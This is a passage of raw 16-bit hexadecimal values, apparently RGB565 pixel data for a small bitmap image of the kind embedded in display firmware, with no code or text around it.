0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xf7df, 0xdfff, 0x3c36, 0x0b95, 0x2416, 0xb79f, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xff9f, 0xffdf, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xfffd, 0xf7dd, 0xf7ff, 0xd7ff, 0x761c, 0x0b52, 0x1b77, 0x85dc, 0xe7ff, 0xfffe, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7bd, 0xffff, 0xffff, 0xefff, 0xd7ff, 0x23b4, 0x1375, 0x655a, 0xe7ff, 0xf7ff, 0xffff, 0xffbd, 0xffff, 0xf7ff, 0xefff, 0x6cd8, 0x020f, 0x0252, 0x02f5, 0x0af5, 0x02d4, 0x0ad4, 0x0272, 0x0a31, 0x5416, 0xe7ff, 0xf7ff, 0xf7df, 0xffff, 0xffbd, 0xfffe, 0xfffe, 0xfffe, 0xf7ff, 0x9eff, 0x13d5, 0x0b74, 0x967c, 0xf7ff, 0xefde, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xeffe, 0xf7fe, 0xffdf, 0xffdf, 0xd6bc, 0xc71e, 0xdfff, 0xa69f, 0x5457, 0x22f2, 0x0270, 0x026f, 0x026f, 0x2313, 0x3354, 0x9e7f, 0xdfff, 0xcf5f, 0xd69d, 0xffbf, 0xfffe, 0xf7fd, 0xf7fe, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xf7be, 0xffdd, 0xf7ff, 0xcfff, 0x3415, 0x1b95, 0x3c78, 0xd7ff, 0xf7ff, 0xfffd, 0xffff, 0xefff, 0xd7df, 0xd7ff, 0xdfff, 0xe7ff, 0xe7ff, 0xffbf, 0xffff, 0xf7fe, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xf7df, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xf7be, 0xf7ff, 0xe7ff, 0xa6bf, 0x1379, 0x1335, 0x8e5c, 0xefff, 0xfffe, 0xffbc, 0xf7fe, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffd, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xf7df, 0xe7ff, 0x3416, 0x13b6, 0x5d5a, 0xefff, 0xfffd, 0xffde, 0xe7bf, 0xefff, 0xefff, 0xc71f, 0x224f, 0x1ab2, 0x1b56, 0x1399, 0x0338, 0x0b59, 0x0318, 0x0b79, 0x1378, 0x1336, 0x1ab2, 0x1a0f, 0xbe5f, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xe7ff, 0xa77f, 0x13b4, 0x1373, 0x9ebd, 0xefff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xf7bf, 0xc6fc, 0xd7ff, 0xdfff, 0xf7ff, 0xffbf, 0xffff, 0xc6fd, 0x22af, 0x0230, 0x02f5, 0x0b17, 0x0b17, 0x1398, 0x1377, 0x1337, 0x12f7, 0x0273, 0x2310, 0xb69b, 0xffff, 0xffbf, 0xf7df, 0xf7ff, 0xe7df, 0xbe9d, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xdfff, 0x3495, 0x0b94, 0x54d9, 0xe7ff, 0xf7ff, 0xf7ff, 0xefdf, 0x9dbb, 0x3331, 0x0a4e, 0x01cc, 0x11ed, 0x32cf, 0x85b8, 0xe7bf, 0xf7ff, 0xfffd, 0xffdd, 0xffbd, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdd, 0xffdd, 0xffdf, 0xffff, 0xaf3f, 0x23d7, 0x0b54, 0x8e5d, 0xf7ff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffdf, 0xffff, 0xffdf, 0xfffe, 0xfffd, 0xffbc, 0xefff, 0x6d9b, 0x13b5, 0x3cd8, 0xd7ff, 0xffde, 0xff9c, 0xffff, 0xf7ff, 0xefff, 0xdfbf, 0x2a91, 0x1ab5, 0x1b38, 0x0b37, 0x0b36, 0x0b37, 0x0b18, 0x0b39, 0x0318, 0x0b58, 0x1397, 0x1b35, 0x22d4, 0x2233, 0xdf7d, 0xe7ff, 0xefff, 0xf7ff, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xefff, 0x8ebd, 0x0bd5, 0x1bf5, 0xd7ff, 0xfffd, 0xffbd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7ff, 0x53b0, 0x122e, 0x3b73, 0x6c32, 0xf7ff, 0xb61b, 0x1a30, 0x1b15, 0x1396, 0x0357, 0x0338, 0x135a, 0x0b19, 0x0b58, 0x0316, 0x1378, 0x1318, 0x1af6, 0x120f, 0xae3b, 0xf7ff, 0x9578, 0x4331, 0x226f, 0x32f1, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0x5cf7, 0x0bd4, 0x3497, 0xe7ff, 0xf7be, 0xf7ff, 0xc71f, 0x2ad3, 0x09d0, 0x22b1, 0x5c55, 0x74f7, 0x6c97, 0x32d1, 0x09cc, 0x22f2, 0xb71f, 0xf7ff, 0xffdc, 0xffdd, 0xffbd, 0xfffd, 0xfffd, 0xfffe, 0xffff, 0xf79f, 0xffff, 0xfffc, 0xfffb, 0xfffe, 0xffbf, 0xf7ff, 0x9eff, 0x0bd7, 0x0b95, 0xb75f, 0xf7df, 0xff9e, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xfffe, 0xffbc, 0xffff, 0xb75f, 0x1bd6, 0x1bf6, 0xc7df, 0xf7ff, 0xf7bd, 0xffff, 0xffff, 0xffde, 0xfffd, 0xdf7f, 0x09ae, 0x1af7, 0x02b7, 0x0337, 0x1396, 0x2bd7, 0x3bf9, 0x3c1a, 0x2bfa, 0x0b55, 0x0314, 0x0ad3, 0x12d5, 0x0192, 0xbe7a, 0xefff, 0xefff, 0xffff, 0xfffe, 0xffde, 0xf7ff, 0xfffe, 0xfffc, 0xe7ff, 0x4dbb, 0x03d6, 0x6d7a, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xf7de, 0xf7fe, 0xdfbf, 0x3b35, 0x09ae, 0xbefd, 0xcf7e, 0x122f, 0x1b19, 0x0319, 0x0397, 0x0b97, 0x0b57, 0x0b18, 0x1339, 0x0b58, 0x1397, 0x0b56, 0x133a, 0x0afb, 0x1b19, 0x0a50, 0xaefe, 0xcfbf, 0x11cd, 0x2a91, 0xdfff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xa6ff, 0x1b94, 0x2415, 0xc7ff, 0xf7ff, 0xffff, 0xdfff, 0x1290, 0x0a11, 0x7cfc, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xdfdf, 0x8d9d, 0x0272, 0x0a90, 0xcf7f, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xfffd, 0xfffd, 0xf7de, 0xffff, 0xffdb, 0xe7ff, 0x765f, 0x0376, 0x3c97, 0xd7ff, 0xffff, 0xffbf, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff,
0xffbf, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xe7ff, 0x3c97, 0x0b54, 0x8e9f, 0xefff, 0xfffe, 0xfffe, 0xf7ff, 0xf7be, 0xffdf, 0xf7dd, 0xf7ff, 0xc6ff, 0x5c78, 0x6d7e, 0x5d7e, 0x5d9e, 0x5d1b, 0x5cba, 0x5c79, 0x651b, 0x659d, 0x6e1f, 0x761e, 0x5499, 0xb6ff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffdd, 0xffff, 0xf7df, 0xffdf, 0xfffd, 0xf7fe, 0xc7ff, 0x1bf5, 0x1b74, 0xc77f, 0xefdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xdf7f, 0x84d8, 0xefff, 0x4391, 0x1314, 0x0b5a, 0x0359, 0x0b78, 0x0b57, 0x1357, 0x1338, 0x0b37, 0x0b57, 0x0b76, 0x0b56, 0x0b38, 0x137a, 0x0b59, 0x0b14, 0x2b73, 0xd7ff, 0x95b9, 0xcefe, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xefdf, 0x2418, 0x1b96, 0x9eff, 0xefff, 0xfffd, 0xefff, 0x4c15, 0x01ee, 0x95fc, 0xe7ff, 0x6c15, 0xd79f, 0xefff, 0xffff, 0xf7ff, 0xefff, 0x965f, 0x120e, 0x4b73, 0xe7ff, 0xefff, 0xefff, 0xe7ff, 0xe7ff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xefff, 0xffdc, 0xffff, 0xdfff, 0x4cf8, 0x1393, 0x7e1b, 0xe7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff,
0xffbe, 0xf7ff, 0xefff, 0xfffe, 0xffdd, 0xffdf, 0x9e9f, 0x13b6, 0x3458, 0xdfff, 0xf7bf, 0xffdf, 0xfffd, 0xfffd, 0xffff, 0xf7df, 0xefff, 0xeffe, 0xffff, 0xcefc, 0x09aa, 0x4c78, 0x2b96, 0x2b75, 0x3333, 0x4331, 0x3331, 0x33b4, 0x3c37, 0x020d, 0xaefe, 0xefff, 0xfffc, 0xffbd, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xffbf, 0xf7be, 0xe7ff, 0x96bf, 0x0b34, 0x4cfb, 0xe7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xffde, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xfffd, 0xf7fd, 0xffff, 0xf7df, 0xffdf, 0xffff, 0xcedf, 0x1270, 0x0b76, 0x0398, 0x0378, 0x0b58, 0x0358, 0x0b38, 0x1359, 0x0b57, 0x0b77, 0x0b78, 0x0b38, 0x0b57, 0x0395, 0x03b5, 0x0b75, 0x0251, 0x9e1c, 0xefff, 0xffdd, 0xffbd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xa596, 0x0378, 0x4d1d, 0xdfff, 0xfffd, 0xfffc, 0xc75f, 0x020f, 0x5c77, 0xefff, 0xe79d, 0x09ac, 0x1251, 0x6c96, 0xef9c, 0xfffd, 0xffdf, 0xffff, 0x8476, 0x116c, 0xc71f, 0xc71f, 0x222c, 0x3ab0, 0x32b2, 0x2ad2, 0x2b52, 0x2330, 0x2ad0, 0x3ad3, 0x3a71, 0x5bb4, 0xdfbf, 0xffde, 0xffbd, 0xf7df, 0xcfff, 0x0b92, 0x23d3, 0xcfdf, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff,
0xffdf, 0xf7ff, 0xf7ff, 0xfffd, 0xffdd, 0xe7ff, 0x34db, 0x03b6, 0x96bd, 0xfffd, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xfffd, 0xfffc, 0xdfff, 0x12b1, 0x1b76, 0x4cb9, 0x757d, 0x757f, 0x6d7f, 0x657e, 0x54fa, 0x2b55, 0x1251, 0xd7bf, 0xeffe, 0xffde, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xffdf, 0xffdf, 0xf7df, 0xf7fe, 0xf7fe, 0xdfff, 0x23b5, 0x13b6, 0xbf7f, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xf7ff, 0xefff, 0xe7bf, 0xdefe, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xe75e, 0xefdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7bf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0x7d3a, 0x0293, 0x0b57, 0x0b58, 0x1318, 0x1af9, 0x1355, 0x0b76, 0x0b76, 0x0b76, 0x0b77, 0x1337, 0x1338, 0x1319, 0x1339, 0x1338, 0x1357, 0x12f3, 0x43f3, 0xdfff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xcfff, 0x1c55, 0x1b92, 0xbf9f, 0xfffe, 0xffde, 0xffdf, 0x9d9d, 0x098e, 0xb67f, 0xf7ff, 0xd7bf, 0x0a8d, 0x0b75, 0x02d6, 0x1336, 0x7dbb, 0xd7df, 0xffff, 0xb6fd, 0x020d, 0x759c, 0xd7ff, 0x1a8e, 0x1aef, 0x3bb5, 0x4b97, 0x2ab3, 0x22f2, 0x2371, 0x43b3, 0x3b13, 0x1252, 0x343b, 0xefff, 0xffde, 0xffde, 0xefff, 0x5d9a, 0x0b93, 0x861b, 0xf7ff, 0xffdd, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
